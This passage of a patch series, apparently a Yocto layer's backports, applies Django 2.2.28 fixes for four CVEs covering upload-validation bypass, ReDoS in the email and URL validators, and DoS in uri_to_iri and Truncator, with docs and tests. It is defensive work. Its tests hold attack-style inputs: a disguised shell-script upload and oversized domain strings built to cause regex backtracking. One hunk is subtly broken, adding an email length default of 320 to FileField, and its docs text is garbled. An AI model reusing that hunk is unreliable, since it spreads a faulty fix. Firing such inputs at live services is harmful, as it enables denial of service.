'django/forms/widgets/file.html' + ++ def __init__(self, attrs=None): ++ if ( ++ attrs is not None ++ and not self.allow_multiple_selected ++ and attrs.get("multiple", False) ++ ): ++ raise ValueError( ++ "%s doesn't support uploading multiple files." ++ % self.__class__.__qualname__ ++ ) ++ if self.allow_multiple_selected: ++ if attrs is None: ++ attrs = {"multiple": True} ++ else: ++ attrs.setdefault("multiple", True) ++ super().__init__(attrs) ++ + def format_value(self, value): + """File input never renders a value.""" + return + + def value_from_datadict(self, data, files, name): + "File widgets take data from FILES, not POST" +- return files.get(name) ++ getter = files.get ++ if self.allow_multiple_selected: ++ try: ++ getter = files.getlist ++ except AttributeError: ++ pass ++ return getter(name) + + def value_omitted_from_data(self, data, files, name): + return name not in files +diff --git a/docs/releases/2.2.28.txt b/docs/releases/2.2.28.txt +index 43270fc..854c6b0 100644 +--- a/docs/releases/2.2.28.txt ++++ b/docs/releases/2.2.28.txt +@@ -20,3 +20,21 @@ CVE-2022-28347: Potential SQL injection via ``QuerySet.explain(**options)`` on P + :meth:`.QuerySet.explain` method was subject to SQL injection in option names, + using a suitably crafted dictionary, with dictionary expansion, as the + ``**options`` argument. ++ ++Backporting the CVE-2023-31047 fix on Django 2.2.28. ++ ++CVE-2023-31047: Potential bypass of validation when uploading multiple files using one form field ++================================================================================================= ++ ++Uploading multiple files using one form field has never been supported by ++:class:`.forms.FileField` or :class:`.forms.ImageField` as only the last ++uploaded file was validated. Unfortunately, :ref:`uploading_multiple_files` ++topic suggested otherwise. ++ ++In order to avoid the vulnerability, :class:`~django.forms.ClearableFileInput` ++and :class:`~django.forms.FileInput` form widgets now raise ``ValueError`` when ++the ``multiple`` HTML attribute is set on them. To prevent the exception and ++keep the old behavior, set ``allow_multiple_selected`` to ``True``. ++ ++For more details on using the new attribute and handling of multiple files ++through a single field, see :ref:`uploading_multiple_files`. +diff --git a/docs/topics/http/file-uploads.txt b/docs/topics/http/file-uploads.txt +index 21a6f06..c1ffb80 100644 +--- a/docs/topics/http/file-uploads.txt ++++ b/docs/topics/http/file-uploads.txt +@@ -127,19 +127,54 @@ field in the model:: + form = UploadFileForm() + return render(request, 'upload.html', {'form': form}) + ++.. _uploading_multiple_files: ++ + Uploading multiple files + ------------------------ + +-If you want to upload multiple files using one form field, set the ``multiple`` +-HTML attribute of field's widget: ++.. ++ Tests in tests.forms_tests.field_tests.test_filefield.MultipleFileFieldTest ++ should be updated after any changes in the following snippets. ++ ++If you want to upload multiple files using one form field, create a subclass ++of the field's widget and set the ``allow_multiple_selected`` attribute on it ++to ``True``. ++ ++In order for such files to be all validated by your form (and have the value of ++the field include them all), you will also have to subclass ``FileField``. See ++below for an example. ++ ++.. admonition:: Multiple file field ++ ++ Django is likely to have a proper multiple file field support at some point ++ in the future. + + .. code-block:: python + :caption: forms.py + + from django import forms + ++ ++ class MultipleFileInput(forms.ClearableFileInput): ++ allow_multiple_selected = True ++ ++ ++ class MultipleFileField(forms.FileField): ++ def __init__(self, *args, **kwargs): ++ kwargs.setdefault("widget", MultipleFileInput()) ++ super().__init__(*args, **kwargs) ++ ++ def clean(self, data, initial=None): ++ single_file_clean = super().clean ++ if isinstance(data, (list, tuple)): ++ result = [single_file_clean(d, initial) for d in data] ++ else: ++ result = single_file_clean(data, initial) ++ return result ++ ++ + class FileFieldForm(forms.Form): +- file_field = forms.FileField(widget=forms.ClearableFileInput(attrs={'multiple': True})) ++ file_field = MultipleFileField() + + Then override the ``post`` method of your + :class:`~django.views.generic.edit.FormView` subclass to handle multiple file +@@ -159,14 +194,32 @@ uploads: + def post(self, request, *args, **kwargs): + form_class = self.get_form_class() + form = self.get_form(form_class) +- files = request.FILES.getlist('file_field') + if form.is_valid(): +- for f in files: +- ... # Do something with each file. + return self.form_valid(form) + else: + return self.form_invalid(form) + ++ def form_valid(self, form): ++ files = form.cleaned_data["file_field"] ++ for f in files: ++ ... # Do something with each file. ++ return super().form_valid() ++ ++.. warning:: ++ ++ This will allow you to handle multiple files at the form level only. Be ++ aware that you cannot use it to put multiple files on a single model ++ instance (in a single field), for example, even if the custom widget is used ++ with a form field related to a model ``FileField``. ++ ++.. backportedfix:: 2.2.28 ++ ++ In previous versions, there was no support for the ``allow_multiple_selected`` ++ class attribute, and users were advised to create the widget with the HTML ++ attribute ``multiple`` set through the ``attrs`` argument. However, this ++ caused validation of the form field to be applied only to the last file ++ submitted, which could have adverse security implications. ++ + Upload Handlers + =============== + +diff --git a/tests/forms_tests/field_tests/test_filefield.py b/tests/forms_tests/field_tests/test_filefield.py +index 3357444..ba559ee 100644 +--- a/tests/forms_tests/field_tests/test_filefield.py ++++ b/tests/forms_tests/field_tests/test_filefield.py +@@ -1,7 +1,8 @@ + import pickle + + from django.core.files.uploadedfile import SimpleUploadedFile +-from django.forms import FileField, ValidationError ++from django.core.validators import validate_image_file_extension ++from django.forms import FileField, FileInput, ValidationError + from django.test import SimpleTestCase + + +@@ -82,3 +83,68 @@ class FileFieldTest(SimpleTestCase): + + def test_file_picklable(self): + self.assertIsInstance(pickle.loads(pickle.dumps(FileField())), FileField) ++ ++ ++class MultipleFileInput(FileInput): ++ allow_multiple_selected = True ++ ++ ++class MultipleFileField(FileField): ++ def __init__(self, *args, **kwargs): ++ kwargs.setdefault("widget", MultipleFileInput()) ++ super().__init__(*args, **kwargs) ++ ++ def clean(self, data, initial=None): ++ single_file_clean = super().clean ++ if isinstance(data, (list, tuple)): ++ result = [single_file_clean(d, initial) for d in data] ++ else: ++ result = single_file_clean(data, initial) ++ return result ++ ++ ++class MultipleFileFieldTest(SimpleTestCase): ++ def test_file_multiple(self): ++ f = MultipleFileField() ++ files = [ ++ SimpleUploadedFile("name1", b"Content 1"), ++ SimpleUploadedFile("name2", b"Content 2"), ++ ] ++ self.assertEqual(f.clean(files), files) ++ ++ def test_file_multiple_empty(self): ++ f = MultipleFileField() ++ files = [ ++ SimpleUploadedFile("empty", b""), ++ SimpleUploadedFile("nonempty", b"Some Content"), ++ ] ++ msg = "'The submitted file is empty.'" ++ with self.assertRaisesMessage(ValidationError, msg): ++ f.clean(files) ++ with self.assertRaisesMessage(ValidationError, msg): ++ f.clean(files[::-1]) ++ ++ def test_file_multiple_validation(self): ++ f = MultipleFileField(validators=[validate_image_file_extension]) ++ ++ good_files = [ ++ SimpleUploadedFile("image1.jpg", b"fake JPEG"), ++ SimpleUploadedFile("image2.png", b"faux image"), ++ SimpleUploadedFile("image3.bmp", b"fraudulent bitmap"), ++ ] ++ self.assertEqual(f.clean(good_files), good_files) ++ ++ evil_files = [ ++ SimpleUploadedFile("image1.sh", b"#!/bin/bash -c 'echo pwned!'\n"), ++ SimpleUploadedFile("image2.png", b"faux image"), ++ SimpleUploadedFile("image3.jpg", b"fake JPEG"), ++ ] ++ ++ evil_rotations = ( ++ evil_files[i:] + evil_files[:i] # Rotate by i. ++ for i in range(len(evil_files)) ++ ) ++ msg = "File extension “sh” is not allowed. Allowed extensions are: " ++ for rotated_evil_files in evil_rotations: ++ with self.assertRaisesMessage(ValidationError, msg): ++ f.clean(rotated_evil_files) +diff --git a/tests/forms_tests/widget_tests/test_clearablefileinput.py b/tests/forms_tests/widget_tests/test_clearablefileinput.py +index 2ba376d..8d9e38a 100644 +--- a/tests/forms_tests/widget_tests/test_clearablefileinput.py ++++ b/tests/forms_tests/widget_tests/test_clearablefileinput.py +@@ -161,3 +161,8 @@ class ClearableFileInputTest(WidgetTest): + self.assertIs(widget.value_omitted_from_data({}, {}, 'field'), True) + self.assertIs(widget.value_omitted_from_data({}, {'field': 'x'}, 'field'), False) + self.assertIs(widget.value_omitted_from_data({'field-clear': 'y'}, {}, 'field'), False) ++ ++ def test_multiple_error(self): ++ msg = "ClearableFileInput doesn't support uploading multiple files." ++ with self.assertRaisesMessage(ValueError, msg): ++ ClearableFileInput(attrs={"multiple": True}) +diff --git a/tests/forms_tests/widget_tests/test_fileinput.py b/tests/forms_tests/widget_tests/test_fileinput.py +index bbd7c7f..24daf5d 100644 +--- a/tests/forms_tests/widget_tests/test_fileinput.py ++++ b/tests/forms_tests/widget_tests/test_fileinput.py +@@ -1,4 +1,6 @@ ++from django.core.files.uploadedfile import SimpleUploadedFile + from django.forms import FileInput ++from django.utils.datastructures import MultiValueDict + + from .base import WidgetTest + +@@ -18,3 +20,45 @@ class FileInputTest(WidgetTest): + def test_value_omitted_from_data(self): + self.assertIs(self.widget.value_omitted_from_data({}, {}, 'field'), True) + self.assertIs(self.widget.value_omitted_from_data({}, {'field': 'value'}, 'field'), False) ++ ++ def test_multiple_error(self): ++ msg = "FileInput doesn't support uploading multiple files." ++ with self.assertRaisesMessage(ValueError, msg): ++ FileInput(attrs={"multiple": True}) ++ ++ def test_value_from_datadict_multiple(self): ++ class MultipleFileInput(FileInput): ++ allow_multiple_selected = True ++ ++ file_1 = SimpleUploadedFile("something1.txt", b"content 1") ++ file_2 = SimpleUploadedFile("something2.txt", b"content 2") ++ # Uploading multiple files is allowed. ++ widget = MultipleFileInput(attrs={"multiple": True}) ++ value = widget.value_from_datadict( ++ data={"name": "Test name"}, ++ files=MultiValueDict({"myfile": [file_1, file_2]}), ++ name="myfile", ++ ) ++ self.assertEqual(value, [file_1, file_2]) ++ # Uploading multiple files is not allowed. ++ widget = FileInput() ++ value = widget.value_from_datadict( ++ data={"name": "Test name"}, ++ files=MultiValueDict({"myfile": [file_1, file_2]}), ++ name="myfile", ++ ) ++ self.assertEqual(value, file_2) ++ ++ def test_multiple_default(self): ++ class MultipleFileInput(FileInput): ++ allow_multiple_selected = True ++ ++ tests = [ ++ (None, True), ++ ({"class": "myclass"}, True), ++ ({"multiple": False}, False), ++ ] ++ for attrs, expected in tests: ++ with self.subTest(attrs=attrs): ++ widget = MultipleFileInput(attrs=attrs) ++ self.assertIs(widget.attrs["multiple"], expected) +-- +2.40.0 diff --git a/meta-python/recipes-devtools/python/python3-django/CVE-2023-36053.patch b/meta-python/recipes-devtools/python/python3-django/CVE-2023-36053.patch new file mode 100644 index 0000000000..2ad38d8e95 --- /dev/null +++ b/meta-python/recipes-devtools/python/python3-django/CVE-2023-36053.patch @@ -0,0 +1,263 @@ +From a0b2eeeb7350d0c3a9b9be191783ff15daeffec5 Mon Sep 17 00:00:00 2001 +From: Mariusz Felisiak <felisiak.mariusz@gmail.com> +Date: Thu, 27 Jul 2023 14:51:48 +0000 +Subject: [PATCH] Fixed CVE-2023-36053 + +-- Prevented potential ReDoS in EmailValidator and URLValidator. + +Thanks Seokchan Yoon for reports. + +CVE: CVE-2023-36053 + +Upstream-Status: Backport [https://github.com/django/django/commit/454f2fb93437f98917283336201b4048293f7582] + +Signed-off-by: Narpat Mali <narpat.mali@windriver.com> +--- + django/core/validators.py | 9 +++++++-- + django/forms/fields.py | 3 +++ + docs/ref/forms/fields.txt | 4 ++++ + docs/ref/validators.txt | 19 ++++++++++++++++++- + docs/releases/2.2.28.txt | 9 +++++++++ + .../field_tests/test_emailfield.py | 5 ++++- + tests/forms_tests/tests/test_forms.py | 19 +++++++++++++------ + tests/validators/tests.py | 11 +++++++++++ + 8 files changed, 69 insertions(+), 10 deletions(-) + +diff --git a/django/core/validators.py b/django/core/validators.py +index 2da0688..2dbd3bf 100644 +--- a/django/core/validators.py ++++ b/django/core/validators.py +@@ -102,6 +102,7 @@ class URLValidator(RegexValidator): + message = _('Enter a valid URL.') + schemes = ['http', 'https', 'ftp', 'ftps'] + unsafe_chars = frozenset('\t\r\n') ++ max_length = 2048 + + def __init__(self, schemes=None, **kwargs): + super().__init__(**kwargs) +@@ -109,7 +110,9 @@ class URLValidator(RegexValidator): + self.schemes = schemes + + def __call__(self, value): +- if isinstance(value, str) and self.unsafe_chars.intersection(value): ++ if not isinstance(value, str) or len(value) > self.max_length: ++ raise ValidationError(self.message, code=self.code) ++ if self.unsafe_chars.intersection(value): + raise ValidationError(self.message, code=self.code) + # Check if the scheme is valid. + scheme = value.split('://')[0].lower() +@@ -190,7 +193,9 @@ class EmailValidator: + self.domain_whitelist = whitelist + + def __call__(self, value): +- if not value or '@' not in value: ++ # The maximum length of an email is 320 characters per RFC 3696 ++ # section 3. ++ if not value or '@' not in value or len(value) > 320: + raise ValidationError(self.message, code=self.code) + + user_part, domain_part = value.rsplit('@', 1) +diff --git a/django/forms/fields.py b/django/forms/fields.py +index a977256..f939338 100644 +--- a/django/forms/fields.py ++++ b/django/forms/fields.py +@@ -542,6 +542,9 @@ class FileField(Field): + def __init__(self, *, max_length=None, allow_empty_file=False, **kwargs): + self.max_length = max_length + self.allow_empty_file = allow_empty_file ++ # The default maximum length of an email is 320 characters per RFC 3696 ++ # section 3. ++ kwargs.setdefault("max_length", 320) + super().__init__(**kwargs) + + def to_python(self, data): +diff --git a/docs/ref/forms/fields.txt b/docs/ref/forms/fields.txt +index 6f76d0d..3a888ef 100644 +--- a/docs/ref/forms/fields.txt ++++ b/docs/ref/forms/fields.txt +@@ -592,6 +592,10 @@ For each field, we describe the default widget used if you don't specify + Has two optional arguments for validation, ``max_length`` and ``min_length``. + If provided, these arguments ensure that the string is at most or at least the + given length. ++ ``empty_value`` which work just as they do for :class:`CharField`. The ++ ``max_length`` argument defaults to 320 (see :rfc:`3696#section-3`). ++ ++ The default value for ``max_length`` was changed to 320 characters. + + ``FileField`` + ------------- +diff --git a/docs/ref/validators.txt b/docs/ref/validators.txt +index 75d1394..4178a1f 100644 +--- a/docs/ref/validators.txt ++++ b/docs/ref/validators.txt +@@ -125,6 +125,11 @@ to, or in lieu of custom ``field.clean()`` methods. + :param code: If not ``None``, overrides :attr:`code`. + :param whitelist: If not ``None``, overrides :attr:`whitelist`. + ++ An :class:`EmailValidator` ensures that a value looks like an email, and ++ raises a :exc:`~django.core.exceptions.ValidationError` with ++ :attr:`message` and :attr:`code` if it doesn't. Values longer than 320 ++ characters are always considered invalid. ++ + .. attribute:: message + + The error message used by +@@ -145,13 +150,17 @@ to, or in lieu of custom ``field.clean()`` methods. + ``['localhost']``. Other domains that don't contain a dot won't pass + validation, so you'd need to whitelist them as necessary. + ++ In older versions, values longer than 320 characters could be ++ considered valid. ++ + ``URLValidator`` + ---------------- + + .. class:: URLValidator(schemes=None, regex=None, message=None, code=None) + + A :class:`RegexValidator` that ensures a value looks like a URL, and raises +- an error code of ``'invalid'`` if it doesn't. ++ an error code of ``'invalid'`` if it doesn't. Values longer than ++ :attr:`max_length` characters are always considered invalid. + + Loopback addresses and reserved IP spaces are considered valid. Literal + IPv6 addresses (:rfc:`3986#section-3.2.2`) and unicode domains are both +@@ -168,6 +177,14 @@ to, or in lieu of custom ``field.clean()`` methods. + + .. _valid URI schemes: https://www.iana.org/assignments/uri-schemes/uri-schemes.xhtml + ++ .. attribute:: max_length ++ ++ The maximum length of values that could be considered valid. Defaults ++ to 2048 characters. ++ ++ In older versions, values longer than 2048 characters could be ++ considered valid. ++ + ``validate_email`` + ------------------ + +diff --git a/docs/releases/2.2.28.txt b/docs/releases/2.2.28.txt +index 854c6b0..ab4884b 100644 +--- a/docs/releases/2.2.28.txt ++++ b/docs/releases/2.2.28.txt +@@ -38,3 +38,12 @@ keep the old behavior, set ``allow_multiple_selected`` to ``True``. + + For more details on using the new attribute and handling of multiple files + through a single field, see :ref:`uploading_multiple_files`. ++ ++Backporting the CVE-2023-36053 fix on Django 2.2.28. ++ ++CVE-2023-36053: Potential regular expression denial of service vulnerability in ``EmailValidator``/``URLValidator`` ++=================================================================================================================== ++ ++``EmailValidator`` and ``URLValidator`` were subject to potential regular ++expression denial of service attack via a very large number of domain name ++labels of emails and URLs. +diff --git a/tests/forms_tests/field_tests/test_emailfield.py b/tests/forms_tests/field_tests/test_emailfield.py +index 826524a..fe5b644 100644 +--- a/tests/forms_tests/field_tests/test_emailfield.py ++++ b/tests/forms_tests/field_tests/test_emailfield.py +@@ -8,7 +8,10 @@ class EmailFieldTest(FormFieldAssertionsMixin, SimpleTestCase): + + def test_emailfield_1(self): + f = EmailField() +- self.assertWidgetRendersTo(f, '<input type="email" name="f" id="id_f" required>') ++ self.assertEqual(f.max_length, 320) ++ self.assertWidgetRendersTo( ++ f, '<input type="email" name="f" id="id_f" maxlength="320" required>' ++ ) + with self.assertRaisesMessage(ValidationError, "'This field is required.'"): + f.clean('') + with self.assertRaisesMessage(ValidationError, "'This field is required.'"): +diff --git a/tests/forms_tests/tests/test_forms.py b/tests/forms_tests/tests/test_forms.py +index d4e421d..8893f89 100644 +--- a/tests/forms_tests/tests/test_forms.py ++++ b/tests/forms_tests/tests/test_forms.py +@@ -422,11 +422,18 @@ class FormsTestCase(SimpleTestCase): + get_spam = BooleanField() + + f = SignupForm(auto_id=False) +- self.assertHTMLEqual(str(f['email']), '<input type="email" name="email" required>') ++ self.assertHTMLEqual( ++ str(f["email"]), ++ '<input type="email" name="email" maxlength="320" required>', ++ ) + self.assertHTMLEqual(str(f['get_spam']), '<input type="checkbox" name="get_spam" required>') + + f = SignupForm({'email': 'test@example.com', 'get_spam': True}, auto_id=False) +- self.assertHTMLEqual(str(f['email']), '<input type="email" name="email" value="test@example.com" required>') ++ self.assertHTMLEqual( ++ str(f["email"]), ++ '<input type="email" name="email" maxlength="320" value="test@example.com" ' ++ "required>", ++ ) + self.assertHTMLEqual( + str(f['get_spam']), + '<input checked type="checkbox" name="get_spam" required>', +@@ -2780,7 +2787,7 @@ Good luck picking a username that doesn't already exist.</p> + <option value="true">Yes</option> + <option value="false">No</option> + </select></li> +-<li><label for="id_email">Email:</label> <input type="email" name="email" id="id_email"></li> ++<li><label for="id_email">Email:</label> <input type="email" name="email" id="id_email" maxlength="320"></li> + <li class="required error"><ul class="errorlist"><li>This field is required.</li></ul> + <label class="required" for="id_age">Age:</label> <input type="number" name="age" id="id_age" required></li>""" + ) +@@ -2796,7 +2803,7 @@ Good luck picking a username that doesn't already exist.</p> + <option value="true">Yes</option> + <option value="false">No</option> + </select></p> +-<p><label for="id_email">Email:</label> <input type="email" name="email" id="id_email"></p> ++<p><label for="id_email">Email:</label> <input type="email" name="email" id="id_email" maxlength="320"></p> + <ul class="errorlist"><li>This field is required.</li></ul> + <p class="required error"><label class="required" for="id_age">Age:</label> + <input type="number" name="age" id="id_age" required></p>""" +@@ -2815,7 +2822,7 @@ Good luck picking a username that doesn't already exist.</p> + <option value="false">No</option> + </select></td></tr> + <tr><th><label for="id_email">Email:</label></th><td> +-<input type="email" name="email" id="id_email"></td></tr> ++<input type="email" name="email" id="id_email" maxlength="320"></td></tr> + <tr class="required error"><th><label class="required" for="id_age">Age:</label></th> + <td><ul class="errorlist"><li>This field is required.</li></ul> + <input type="number" name="age" id="id_age" required></td></tr>""" +@@ -3428,7 +3435,7 @@ Good luck picking a username that doesn't already exist.</p> + f = CommentForm(data, auto_id=False, error_class=DivErrorList) + self.assertHTMLEqual(f.as_p(), """<p>Name: <input type="text" name="name" maxlength="50"></p> + <div class="errorlist"><div class="error">Enter a valid email address.</div></div> +-<p>Email: <input type="email" name="email" value="invalid" required></p> ++<p>Email: <input type="email" name="email" value="invalid" maxlength="320" required></p> + <div class="errorlist"><div class="error">This field is required.</div></div> + <p>Comment: <input type="text" name="comment" required></p>""") + +diff --git a/tests/validators/tests.py b/tests/validators/tests.py +index 1f09fb5..8204f00 100644 +--- a/tests/validators/tests.py ++++ b/tests/validators/tests.py +@@ -58,6 +58,7 @@ TEST_DATA = [ + + (validate_email, 'example@atm.%s' % ('a' * 64), ValidationError), + (validate_email, 'example@%s.atm.%s' % ('b' * 64, 'a' * 63), ValidationError), ++ (validate_email, "example@%scom" % (("a" * 63 + ".") * 100), ValidationError), + (validate_email, None, ValidationError), + (validate_email, '', ValidationError), + (validate_email, 'abc', ValidationError), +@@ -242,6 +243,16 @@ TEST_DATA = [ + (URLValidator(EXTENDED_SCHEMES), 'git+ssh://git@github.com/example/hg-git.git', None), + + (URLValidator(EXTENDED_SCHEMES), 'git://-invalid.com', ValidationError), ++ ( ++ URLValidator(), ++ "http://example." + ("a" * 63 + ".") * 1000 + "com", ++ ValidationError, ++ ), ++ ( ++ URLValidator(), ++ "http://userid:password" + "d" * 2000 + "@example.aaaaaaaaaaaaa.com", ++ None, ++ ), + # Newlines and tabs are not accepted. + (URLValidator(), 'http://www.djangoproject.com/\n', ValidationError), + (URLValidator(), 'http://[::ffff:192.9.5.5]\n', ValidationError), +-- +2.40.0 diff --git a/meta-python/recipes-devtools/python/python3-django/CVE-2023-41164.patch b/meta-python/recipes-devtools/python/python3-django/CVE-2023-41164.patch new file mode 100644 index 0000000000..9bc38b0cca --- /dev/null +++ b/meta-python/recipes-devtools/python/python3-django/CVE-2023-41164.patch @@ -0,0 +1,105 @@ +From 9c95e8fec62153f8dfcc45a70b8a68d74333a66f Mon Sep 17 00:00:00 2001 +From: Mariusz Felisiak <felisiak.mariusz@gmail.com> +Date: Tue, 26 Sep 2023 10:23:30 +0000 +Subject: [PATCH] Fixed CVE-2023-41164 -- Fixed potential DoS in + django.utils.encoding.uri_to_iri(). + +Thanks MProgrammer (https://hackerone.com/mprogrammer) for the report. + +Co-authored-by: nessita <124304+nessita@users.noreply.github.com> + +CVE: CVE-2023-41164 + +Upstream-Status: Backport [https://github.com/django/django/commit/3f41d6d62929dfe53eda8109b3b836f26645bdce] + +Signed-off-by: Narpat Mali <narpat.mali@windriver.com> +--- + django/utils/encoding.py | 6 ++++-- + docs/releases/2.2.28.txt | 9 +++++++++ + tests/utils_tests/test_encoding.py | 21 ++++++++++++++++++++- + 3 files changed, 33 insertions(+), 3 deletions(-) + +diff --git a/django/utils/encoding.py b/django/utils/encoding.py +index 98da647..3769702 100644 +--- a/django/utils/encoding.py ++++ b/django/utils/encoding.py +@@ -225,6 +225,7 @@ def repercent_broken_unicode(path): + repercent-encode any octet produced that is not part of a strictly legal + UTF-8 octet sequence. + """ ++ changed_parts = [] + while True: + try: + path.decode() +@@ -232,9 +233,10 @@ def repercent_broken_unicode(path): + # CVE-2019-14235: A recursion shouldn't be used since the exception + # handling uses massive amounts of memory + repercent = quote(path[e.start:e.end], safe=b"/#%[]=:;$&()+,!?*@'~") +- path = path[:e.start] + force_bytes(repercent) + path[e.end:] ++ changed_parts.append(path[: e.start] + repercent.encode()) ++ path = path[e.end :] + else: +- return path ++ return b"".join(changed_parts) + path + + + def filepath_to_uri(path): +diff --git a/docs/releases/2.2.28.txt b/docs/releases/2.2.28.txt +index ab4884b..40eb230 100644 +--- a/docs/releases/2.2.28.txt ++++ b/docs/releases/2.2.28.txt +@@ -47,3 +47,12 @@ CVE-2023-36053: Potential regular expression denial of service vulnerability in + ``EmailValidator`` and ``URLValidator`` were subject to potential regular + expression denial of service attack via a very large number of domain name + labels of emails and URLs. ++ ++Backporting the CVE-2023-41164 fix on Django 2.2.28. ++ ++CVE-2023-41164: Potential denial of service vulnerability in ``django.utils.encoding.uri_to_iri()`` ++=================================================================================================== ++ ++``django.utils.encoding.uri_to_iri()`` was subject to potential denial of ++service attack via certain inputs with a very large number of Unicode ++characters. +diff --git a/tests/utils_tests/test_encoding.py b/tests/utils_tests/test_encoding.py +index ea7ba5f..93a3162 100644 +--- a/tests/utils_tests/test_encoding.py ++++ b/tests/utils_tests/test_encoding.py +@@ -1,8 +1,9 @@ + import datetime ++import inspect + import sys + import unittest + from unittest import mock +-from urllib.parse import quote_plus ++from urllib.parse import quote, quote_plus + + from django.test import SimpleTestCase + from django.utils.encoding import ( +@@ -100,6 +101,24 @@ class TestEncodingUtils(SimpleTestCase): + except RecursionError: + self.fail('Unexpected RecursionError raised.') + ++ def test_repercent_broken_unicode_small_fragments(self): ++ data = b"test\xfctest\xfctest\xfc" ++ decoded_paths = [] ++ ++ def mock_quote(*args, **kwargs): ++ # The second frame is the call to repercent_broken_unicode(). ++ decoded_paths.append(inspect.currentframe().f_back.f_locals["path"]) ++ return quote(*args, **kwargs) ++ ++ with mock.patch("django.utils.encoding.quote", mock_quote): ++ self.assertEqual(repercent_broken_unicode(data), b"test%FCtest%FCtest%FC") ++ ++ # decode() is called on smaller fragment of the path each time. ++ self.assertEqual( ++ decoded_paths, ++ [b"test\xfctest\xfctest\xfc", b"test\xfctest\xfc", b"test\xfc"], ++ ) ++ + + class TestRFC3987IEncodingUtils(unittest.TestCase): + +-- +2.40.0 diff --git a/meta-python/recipes-devtools/python/python3-django/CVE-2023-43665.patch b/meta-python/recipes-devtools/python/python3-django/CVE-2023-43665.patch new file mode 100644 index 0000000000..dbfb9b68a8 --- /dev/null +++ b/meta-python/recipes-devtools/python/python3-django/CVE-2023-43665.patch @@ -0,0 +1,199 @@ +From b269a0063e9b10a6c88c92b24d1b92c7421950de Mon Sep 17 00:00:00 2001 +From: Natalia <124304+nessita@users.noreply.github.com> +Date: Wed, 29 Nov 2023 12:20:01 +0000 +Subject: [PATCH 1/2] Fixed CVE-2023-43665 -- Mitigated potential DoS in + django.utils.text.Truncator when truncating HTML text. + +Thanks Wenchao Li of Alibaba Group for the report. + +CVE: CVE-2023-43665 + +Upstream-Status: Backport [https://github.com/django/django/commit/ccdade1a0262537868d7ca64374de3d957ca50c5] + +Signed-off-by: Narpat Mali <narpat.mali@windriver.com> +--- + django/utils/text.py | 18 ++++++++++++++++- + docs/ref/templates/builtins.txt | 20 +++++++++++++++++++ + docs/releases/2.2.28.txt | 20 +++++++++++++++++++ + tests/utils_tests/test_text.py | 35 ++++++++++++++++++++++++--------- + 4 files changed, 83 insertions(+), 10 deletions(-) + +diff --git a/django/utils/text.py b/django/utils/text.py +index 1fae7b2..06a377b 100644 +--- a/django/utils/text.py ++++ b/django/utils/text.py +@@ -57,7 +57,14 @@ def wrap(text, width): + class Truncator(SimpleLazyObject): + """ + An object used to truncate text, either by characters or words. ++ ++ When truncating HTML text (either chars or words), input will be limited to ++ at most `MAX_LENGTH_HTML` characters. + """ ++ ++ # 5 million characters are approximately 4000 text pages or 3 web pages. ++ MAX_LENGTH_HTML = 5_000_000 ++ + def __init__(self, text): + super().__init__(lambda: str(text)) + +@@ -154,6 +161,11 @@ class Truncator(SimpleLazyObject): + if words and length <= 0: + return '' + ++ size_limited = False ++ if len(text) > self.MAX_LENGTH_HTML: ++ text = text[: self.MAX_LENGTH_HTML] ++ size_limited = True ++ + html4_singlets = ( + 'br', 'col', 'link', 'base', 'img', + 'param', 'area', 'hr', 'input' +@@ -203,10 +215,14 @@ class Truncator(SimpleLazyObject): + # Add it to the start of the open tags list + open_tags.insert(0, tagname) + ++ truncate_text = self.add_truncation_text("", truncate) ++ + if current_len <= length: ++ if size_limited and truncate_text: ++ text += truncate_text + return text ++ + out = text[:end_text_pos] +- truncate_text = self.add_truncation_text('', truncate) + if truncate_text: + out += truncate_text + # Close any tags still open +diff --git a/docs/ref/templates/builtins.txt b/docs/ref/templates/builtins.txt +index c4b0fa3..4faab38 100644 +--- a/docs/ref/templates/builtins.txt ++++ b/docs/ref/templates/builtins.txt +@@ -2318,6 +2318,16 @@ If ``value`` is ``"<p>Joel is a slug</p>"``, the output will be + + Newlines in the HTML content will be preserved. + ++.. admonition:: Size of input string ++ ++ Processing large, potentially malformed HTML strings can be ++ resource-intensive and impact service performance. ``truncatechars_html`` ++ limits input to the first five million characters. ++ ++.. versionchanged:: 2.2.28 ++ ++ In older versions, strings over five million characters were processed. ++ + .. templatefilter:: truncatewords + + ``truncatewords`` +@@ -2356,6 +2366,16 @@ If ``value`` is ``"<p>Joel is a slug</p>"``, the output will be + + Newlines in the HTML content will be preserved. + ++.. admonition:: Size of input string ++ ++ Processing large, potentially malformed HTML strings can be ++ resource-intensive and impact service performance. ``truncatewords_html`` ++ limits input to the first five million characters. ++ ++.. versionchanged:: 2.2.28 ++ ++ In older versions, strings over five million characters were processed. ++ + .. templatefilter:: unordered_list + + ``unordered_list`` +diff --git a/docs/releases/2.2.28.txt b/docs/releases/2.2.28.txt +index 40eb230..6a38e9c 100644 +--- a/docs/releases/2.2.28.txt ++++ b/docs/releases/2.2.28.txt +@@ -56,3 +56,23 @@ CVE-2023-41164: Potential denial of service vulnerability in ``django.utils.enco + ``django.utils.encoding.uri_to_iri()`` was subject to potential denial of + service attack via certain inputs with a very large number of Unicode + characters. ++ ++Backporting the CVE-2023-43665 fix on Django 2.2.28. ++ ++CVE-2023-43665: Denial-of-service possibility in ``django.utils.text.Truncator`` ++================================================================================ ++ ++Following the fix for :cve:`2019-14232`, the regular expressions used in the ++implementation of ``django.utils.text.Truncator``'s ``chars()`` and ``words()`` ++methods (with ``html=True``) were revised and improved. However, these regular ++expressions still exhibited linear backtracking complexity, so when given a ++very long, potentially malformed HTML input, the evaluation would still be ++slow, leading to a potential denial of service vulnerability. ++ ++The ``chars()`` and ``words()`` methods are used to implement the ++:tfilter:`truncatechars_html` and :tfilter:`truncatewords_html` template ++filters, which were thus also vulnerable. ++ ++The input processed by ``Truncator``, when operating in HTML mode, has been ++limited to the first five million characters in order to avoid potential ++performance and memory issues. +diff --git a/tests/utils_tests/test_text.py b/tests/utils_tests/test_text.py +index 27e440b..cb3063d 100644 +--- a/tests/utils_tests/test_text.py ++++ b/tests/utils_tests/test_text.py +@@ -1,5 +1,6 @@ + import json + import sys ++from unittest.mock import patch + + from django.core.exceptions import SuspiciousFileOperation + from django.test import SimpleTestCase +@@ -87,11 +88,17 @@ class TestUtilsText(SimpleTestCase): + # lazy strings are handled correctly + self.assertEqual(text.Truncator(lazystr('The quick brown fox')).chars(10), 'The quick…') + +- def test_truncate_chars_html(self): ++ @patch("django.utils.text.Truncator.MAX_LENGTH_HTML", 10_000) ++ def test_truncate_chars_html_size_limit(self): ++ max_len = text.Truncator.MAX_LENGTH_HTML ++ bigger_len = text.Truncator.MAX_LENGTH_HTML + 1 ++ valid_html = "<p>Joel is a slug</p>" # 14 chars + perf_test_values = [ +- (('</a' + 